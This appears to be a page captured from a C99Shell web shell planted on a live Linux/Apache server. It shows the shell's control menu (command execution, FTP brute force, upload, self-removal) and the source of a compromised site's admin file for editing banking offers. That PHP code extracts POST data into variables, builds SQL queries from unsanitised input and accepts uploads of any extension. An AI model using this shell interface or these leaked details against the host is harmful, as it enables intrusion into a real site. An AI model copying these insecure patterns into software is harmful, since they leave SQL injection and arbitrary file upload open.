!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/public_html/2018/panel/   drwxr-xr-x
Free 985.28 GB of 1859.98 GB (52.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     modificar-oferta.php (3.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
session_start
();
$pagina_actual="administrar-ofertas";
$categoria_actual="ofertas";
require_once(
"includes/config.php");
require_once(
"includes/funciones.php");

if (isset(
$_POST["id"])){
    
    
extract($_POSTEXTR_SKIP);
    
    if (isset(
$_FILES["pdf"])){
        
$archivo=$_FILES["pdf"];            
        if (
$archivo["tmp_name"]!=""){
            
            
//elimino pdf
            
if (file_exists($carpeta_ofertas.$pdf_actual)){
                @
unlink($carpeta_ofertas.$pdf_actual);
            }
            
            
$timestamp=time();
            
$trozos explode("."$archivo["name"]); 
            
$extension end($trozos); 
            
$nombre_archivo=$timestamp.'.'.$extension;
            
move_uploaded_file ($archivo["tmp_name"],$carpeta_ofertas.$nombre_archivo);
        
        
$result=$mysqli->query("
        UPDATE banking_ofertas SET 
        adjunto='"
.$nombre_archivo."'
        WHERE id='
$id'");    
        
        }
    }
    
    
    
$result=$mysqli->query("
    UPDATE banking_ofertas SET 
    fecha='"
.$fecha."',
    titulo='"
.utf8_decode($titulo)."',
    detalle='"
.utf8_decode($descripcion)."'
    WHERE id='
$id'
    "
);        
    
header('Location: administrar-ofertas.php?exito=si');
}

if (isset(
$_GET["id"])){
    
$id=cadena_segura($_GET["id"],11);
    
    
$result=$mysqli->query("
    SELECT id, fecha, titulo, descripcion
    FROM banking_ofertas
    WHERE id='
$id'
    "
);
    
$item mysqli_fetch_assoc($result);
/*
$paises = $mysqli->query("
SELECT p.id, p.nombre 
FROM pais p
ORDER by nombre
");
*/
?>
<div class="modal-content">
    <form method="post" action="modificar-oferta.php" enctype="multipart/form-data">
    <input type="hidden" name="id" value="<?=$id?>">
    <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal">&times;</button>
        <h4 class="modal-title"></h4>
    </div>
    <div class="modal-body">
    
        <div class="form-group">
            <label>Fecha</label>
             <input class="form-control" name="fecha" type="date" required value="<?=$item["fecha"]?>" />
        </div>  
        
        <div class="form-group">
            <label>Título</label>
            <input class="form-control" name="titulo" value="<?=utf8_encode($item["titulo"])?>">
        </div>  

        <div class="form-group">
            <label>Descripción</label>
            <textarea class="form-control" name="detalle"><?=utf8_encode($item["descripcion"])?></textarea>
        </div>
        
        <div class="form-group">
            <label>PDF</label>
            <input type="file" class="form-control" name="pdf">
        </div> 
        <? /*
        <div class="form-group">
            <label>País para paquetes</label>
            <select class="form-control" name="id_pais">
                <option value="0">Sin país (saldrán los paquetes recomendados)</option>
                <? while ($item2 = mysqli_fetch_assoc($paises)){?>
                <option value="<?=$item2["id"]?>" <?=$item["id_pais"]==$item2["id"]?"selected":""?>><?=utf8_encode($item2["nombre"])?></option>
                <? }?>
            </select>
        </div>   
        */ 
?>                               
    </div>
    <div class="modal-footer">
        <a href="#" class="btn btn-white" data-dismiss="modal">Cerrar</a>
        <input type="submit" class="btn btn-primary" value="Modificar">
    </div>
    </form>
</div><!-- /.modal-content -->
<? }?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0183 ]--